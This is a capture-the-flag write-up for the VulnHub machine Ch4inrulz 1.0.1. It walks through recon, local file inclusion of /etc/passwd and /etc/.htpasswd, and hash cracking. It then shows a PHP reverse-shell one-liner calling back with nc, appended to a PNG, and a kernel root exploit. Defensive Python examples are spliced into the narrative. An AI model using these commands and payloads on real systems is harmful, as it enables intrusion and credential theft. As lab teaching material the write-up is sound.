Ch4inrulz 1.0.1 – Writeup

Details

This machine is https://www.vulnhub.com/entry/ch4inrulz-101,247/

Recon Phase

Starting with a discovery scan

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00045s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0015s latency).
MAC Address: 08:00:27:86:71:8D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0013s latency).
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.19 seconds

Then service discovery

root@kali:~# nmap -sV 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

And then I ran some scripts against the services

root@kali:~# nmap -sC 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh
| ssh-hostkey:
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http
|_http-title: FRANK's Website | Under development
8011/tcp open  unknown
MAC Address: 08:00:27:53:54:9D (Oracle VirtualBox virtual NIC)

Shell Hunting

I first checked out the FTP server, as the scan says it allows anonymous login, so in a browser I went to ftp://192.168.56.101

Screenshot 1

From here I went to the first webserver on http://192.168.56.101

Screenshot 2

And then setup dirbuster on it

Screenshot 3

Screenshot 4

The development section caught my attention so I checked it out at http://192.168.56.101/development/

Screenshot 5

It had basic http auth, but I had no creds so I moved onto webserver #2 on http://192.168.56.101:8011/

Screenshot 6

And then dirbuster

Screenshot 7

Screenshot 8

So I went to the api section http://192.168.56.101:8011/api/

Screenshot 9

I went to each of those files in turn, but only files_api.php returned anything

Screenshot 10

As it says it needs a file, I tried including /etc/passwd by going to http://192.168.56.101:8011/api/files_api.php?file=etc/passwd

Screenshot 11

This didn't work, but I realised it never specified that it wanted a GET request, so I used curl to try a POST

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/etc/passwd"
<head>
  <title>franks website | simple website browser API</title>
</head>
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

This worked, so I now had LFI and some details. The main piece of information is the username frank. From here I carried on using the LFI to try and find the location of the other webserver on the server itself; eventually I found it was

/var/www/index.html

Which I included to check

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/index.html"
[SNIP]
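The files_api.php endpoint hands whatever the file parameter names straight to the filesystem, which is why an absolute path like /etc/passwd comes back. The following is an added example, not the VM's own code, showing the checks a file-browser API needs before it touches the disk: no absolute paths, no hidden files, realpath confinement to the document root, and an extension allowlist. The document root and its contents are constructed in a temporary directory purely for the demonstration.

```python
import os
import tempfile

# Constructed sample document root; stands in for /var/www on the target.
def make_sample_root():
    root = tempfile.mkdtemp(prefix="docroot_")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>sample index</h1>\n")
    os.mkdir(os.path.join(root, "development"))
    with open(os.path.join(root, "development", ".htaccess"), "w") as f:
        f.write("AuthType Basic\n")
    return root

# Only file types a "simple website browser" has any business returning.
ALLOWED_SUFFIXES = (".html", ".txt")


class FileApiError(Exception):
    pass


def read_api_file(document_root, requested):
    """Return the contents of `requested` only if it is a regular file inside
    document_root with an allowed extension. Each check corresponds to one
    thing the writeup's endpoint did not do."""
    if not requested or "\x00" in requested:
        raise FileApiError("empty or NUL-containing name")
    if os.path.isabs(requested):
        # "/etc/passwd" and "/etc/.htpasswd" stop here.
        raise FileApiError("absolute paths are not accepted")
    if any(part.startswith(".") for part in requested.split("/")):
        # .htaccess, .htpasswd and "../" components are all rejected.
        raise FileApiError("hidden files and parent references are not served")
    root = os.path.realpath(document_root)
    target = os.path.realpath(os.path.join(root, requested))
    # realpath collapses ../ and follows symlinks; the result must stay under root.
    if os.path.commonpath([root, target]) != root:
        raise FileApiError("path escapes document root")
    if not target.endswith(ALLOWED_SUFFIXES):
        raise FileApiError("file type not allowed")
    if not os.path.isfile(target):
        raise FileApiError("not a regular file")
    with open(target, "r", encoding="utf-8", errors="replace") as f:
        return f.read()


def safe_read(document_root, requested):
    """Convenience wrapper: None on any rejection instead of an exception."""
    try:
        return read_api_file(document_root, requested)
    except FileApiError:
        return None


if __name__ == "__main__":
    root = make_sample_root()
    for name in ("index.html", "../../etc/passwd", "/etc/passwd", "development/.htaccess"):
        print("%-25s -> %r" % (name, safe_read(root, name)))
```

One detection caveat worth noting from the writeup: the successful requests went in a POST body, so unlike the failed GET attempt they leave no file= parameter in a default Apache access log; spotting this kind of probing needs request-body logging or a WAF in front of the endpoint.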

Now that I knew the location of the web root, I wanted to get things from inside the /development folder

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/index.html"
<head>
  <title>franks website | simple website browser API</title>
</head>
<title>my Development tools</title>
<b>* Here is my unfinished tools list</b>
<h4>- the uploader tool (finished but need security review)</h4>

As I knew it was using HTTP basic auth, which is normally set up in .htaccess, I tried to include that

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/.htaccess"
<head>
  <title>franks website | simple website browser API</title>
</head>
AuthUserFile /etc/.htpasswd
AuthName "Frank Development Area"
AuthType Basic
AuthGroupFile /dev/null
<Limit GET POST>
require valid-user
</Limit>

This gave me the location of the auth file which I then read

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/etc/.htpasswd"
<head>
  <title>franks website | simple website browser API</title>
</head>
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

I now had a username and hash, which I put in a file called hash.txt

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

To crack this hash, I used john

root@kali:~# john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2018-09-13 12:28) 25.00g/s 4700p/s 4700c/s 4700C/s frank!!..fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed
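What john is doing above is recomputing Apache's apr1 hash (md5crypt with a different magic string) for every candidate and comparing. The following is an added example, not part of the writeup, implementing that hash in pure Python so an .htpasswd entry can be verified against a candidate password; it is used here to confirm the entry above against the password john reported. The construction also shows why the format is cheap to attack: a fixed 1000 rounds of MD5 and no memory cost, which is why Apache 2.4's htpasswd -B (bcrypt) is the better choice for new entries.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
APR1_MAGIC = b"$apr1$"


def _to64(value, count):
    """md5crypt's own base-64 variant: 6 bits at a time, low bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def apr1_hash(password, salt):
    """Apache apr1 / md5crypt. Returns the full "$apr1$salt$hash" string."""
    pw = password.encode("utf-8")
    sb = salt.encode("utf-8")[:8]          # salt is at most 8 characters
    ctx = hashlib.md5(pw + APR1_MAGIC + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    remaining = len(pw)
    while remaining > 0:                   # as many bytes of alt as pw is long
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(pw)
    while bits:                            # one byte per bit of len(pw)
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                  # fixed stretching, cheap on a GPU
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sb)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # Output bytes are interleaved in this fixed order before encoding.
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = ""
    for a, b, c in order:
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return "$apr1$" + sb.decode() + "$" + encoded


def verify_htpasswd_line(line, username, password):
    """Check one user:hash line from an .htpasswd file against a candidate.
    Only the $apr1$ format is handled here."""
    user, _, stored = line.strip().partition(":")
    if user != username or not stored.startswith("$apr1$"):
        return False
    salt = stored.split("$")[2]
    return hmac.compare_digest(apr1_hash(password, salt), stored)


if __name__ == "__main__":
    # The entry read from /etc/.htpasswd in the writeup.
    entry = "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"
    print(verify_htpasswd_line(entry, "frank", "frank!!!"))   # True
    print(verify_htpasswd_line(entry, "frank", "password"))   # False
```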

I could now log into the development section with frank:frank!!!, so I went over to it at http://192.168.56.101/development/

This page mentioned an uploader, which I found on http://192.168.56.101/development/uploader/

Screenshot 12

From this I could upload a fake image containing PHP and include it through the LFI to get the code run. First I wanted a real PNG, in the hope that it would bypass checks on image files, so I grabbed a small PNG from Wikimedia

root@kali:~# wget https://upload.wikimedia.org/wikipedia/en/7/7a/Scorpions.png
--2018-09-13 15:55:18--  https://upload.wikimedia.org/wikipedia/en/7/7a/Scorpions.png
Resolving upload.wikimedia.org (upload.wikimedia.org)... 91.198.174.208, 2620:0:862:ed1a::2:b
Connecting to upload.wikimedia.org (upload.wikimedia.org)|91.198.174.208|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1171 (1.1K) [image/png]
Saving to: ‘Scorpions.png’
Scorpions.png       100%[===================>]   1.14K  --.-KB/s    in 0s
2018-09-13 15:55:18 (21.1 MB/s) - ‘Scorpions.png’ saved [1171/1171]

I then appended some PHP to the end of the file to open a reverse shell

root@kali:~# echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 4444 >/tmp/f') ?>" >> Scorpions.png

Which I then selected and uploaded

Screenshot 13

Luckily I had used a real file, as it tried to verify that the file was an image using its MIME type. The text said it was uploaded to an uploads folder, which I hadn't found yet. I dug around for a bit before I found something interesting
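The uploader accepted the file because a MIME check only looks at the first bytes, and those still belong to a genuine PNG; the appended PHP sits after the image's IEND chunk where nothing inspects it. The following is an added example, not the VM's uploader, of a Python validator that walks the PNG chunk structure and rejects bad CRCs or any bytes after IEND. The sample image is constructed in code (a 1x1 greyscale PNG), not the Scorpions.png from the writeup. Even with this check the real fix is that uploads must never be reachable by an include, since PHP will execute a `<?php` block wherever it finds one in an included file.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, data):
    """Build one PNG chunk: 4-byte length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_sample_png():
    """Constructed 1x1, 8-bit greyscale PNG used only for this demonstration."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")   # filter type 0 + one grey pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def png_problems(data):
    """Return the reasons `data` is not a clean PNG; an empty list means clean.
    Unlike a magic-number or MIME check this reads every chunk up to IEND and
    then insists that nothing follows it."""
    problems = []
    if not data.startswith(PNG_SIGNATURE):
        return ["missing PNG signature"]
    pos = len(PNG_SIGNATURE)
    seen_iend = False
    first = True
    while pos + 8 <= len(data) and not seen_iend:
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            problems.append("truncated chunk %r" % ctype)
            return problems
        if first and ctype != b"IHDR":
            problems.append("first chunk is not IHDR")
        first = False
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != struct.unpack(">I", crc_bytes)[0]:
            problems.append("bad CRC in chunk %r" % ctype)
        if ctype == b"IEND":
            seen_iend = True
        pos += 12 + length
    if not seen_iend:
        problems.append("no IEND chunk")
    if pos != len(data):
        # This is exactly where an appended script lands.
        problems.append("%d trailing bytes after IEND" % (len(data) - pos))
    return problems


def is_clean_png(data):
    return png_problems(data) == []


if __name__ == "__main__":
    clean = make_sample_png()
    print(png_problems(clean))                            # []
    print(png_problems(clean + b"<?php echo 'x'; ?>"))   # trailing bytes reported
```

A rejected file should be discarded rather than "cleaned" by truncating at IEND: the safer design is to re-encode accepted images through an image library and store them under a server-generated name outside any directory that scripts can include from.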

Screenshot 14

The user likes patterns, and most things so far have been in the format of

frank{name}

so I tried a few variations of it under http://192.168.56.101/development/uploader

frankupload
franksupload
frankuploads
franksuploads
FrankUpload
FranksUpload
FranksUpoloads

None worked, but I eventually got to

FRANKuploads

Screenshot 15

Having found the file I was ready to include it, so I set up a listener

root@kali:~# nc -nvlp 4444

And included the image

root@kali:~# curl -X POST http://192.168.56.101:8011/api/files_api.php --data "file=/var/www/development/uploader/FRANKuploads/Scorpions.png"

Checking back on the listener

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 50308
/bin/sh: can't access tty; job control turned off
$

I now had a shell

Route to Root

With a shell in place, I used python to upgrade it

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/anotherwww/api$

Now, I knew about frank's home dir, so I went over there first

www-data@ubuntu:/var/anotherwww/api$ cd /home/frank
www-data@ubuntu:/home/frank$ ls -la
drwxr-xr-x 3 frank frank 4096 Apr 14 07:37 .
drwxr-xr-x 3 root  root  4096 Apr 13 16:06 ..
-rw------- 1 frank frank   26 Jul 31 07:44 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 13 16:06 .bash_logout
-rw-r--r-- 1 frank frank 3353 Apr 13 16:06 .bashrc
drwxr-xr-x 2 frank frank 4096 Apr 13 16:07 .cache
-rw-r--r-- 1 frank frank  675 Apr 13 16:06 .profile
-rw-r--r-- 1 frank frank    0 Apr 13 16:08 .sudo_as_admin_successful
-rw-r--r-- 1 frank frank   29 Apr 14 07:37 PE.txt
-rw-r--r-- 1 frank frank   33 Apr 14 07:36 user.txt

There was the user flag and a file called PE.txt. PE.txt contained nothing that helped me on this machine, but I grabbed the user flag

www-data@ubuntu:/home/frank$ cat user.txt
4795aa2a9be22fac10e1c25794e75c1b

I went looking for potential exploits against this machine

www-data@ubuntu:/home/frank$ uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux

This was a pretty out-of-date kernel, so I knew I would be able to find an exploit for it. I settled on https://www.exploit-db.com/exploits/15285/, which I downloaded onto my Kali machine, ready to transfer onto the target (as I keep my target machines isolated on a virtual network, I could not download the exploit directly to it)

root@kali:~# wget https://www.exploit-db.com/download/15285.c
--2018-09-13 16:27:56--  https://www.exploit-db.com/download/15285.c
Resolving www.exploit-db.com (www.exploit-db.com)... 62.24.151.225, 62.24.138.17
Connecting to www.exploit-db.com (www.exploit-db.com)|62.24.151.225|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [application/txt]
Saving to: ‘15285.c’
15285.c                           100%[===========================================================>]   6.99K  --.-KB/s    in 0s
2018-09-13 16:27:59 (366 MB/s) - ‘15285.c’ saved [7155/7155]

I then used netcat to transfer it

root@kali:~# nc -nvlp 2222 < 15285.c

Then on the target

www-data@ubuntu:/home/frank$ cd /tmp
www-data@ubuntu:/tmp$ nc 192.168.56.102 2222 > exploit.c

I confirmed it had transferred

www-data@ubuntu:/tmp$ ls -la
drwxrwxrwt  2 root     root      4096 Sep 13 14:24 .
drwxr-xr-x 22 root     root      4096 Apr 13 16:10 ..
-rw-r--r--  1 www-data www-data 7155 Sep 13 14:24 exploit.c

Compiled the exploit

www-data@ubuntu:/tmp$ gcc exploit.c -o exploit

Checked that the file was there

www-data@ubuntu:/tmp$ ls -la
drwxrwxrwt  2 root     root      4096 Sep 13 14:26 .
drwxr-xr-x 22 root     root      4096 Apr 13 16:10 ..
-rwxr-xr-x  1 www-data www-data 14022 Sep 13 14:26 exploit
-rw-r--r--  1 www-data www-data 7155 Sep 13 14:24 exploit.c

And finally, ran the exploit

www-data@ubuntu:/tmp$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
#

This spawned a root shell, so I went to get the flag

# cd /root
# ls -la
drwx------  4 root root 4096 Apr 14 07:36 .
drwxr-xr-x 22 root root 4096 Apr 13 16:10 ..
drwx------  2 root root 4096 Apr 13 16:06 .aptitude
-rw-------  1 root root   82 Jul 31 07:44 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr 14 07:32 .cache
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
-rw-r--r--  1 root root   33 Apr 14 07:36 root.txt
# cat root.txt
8f420533b79076cc99e9f95a1a4e5568

And the machine was done!
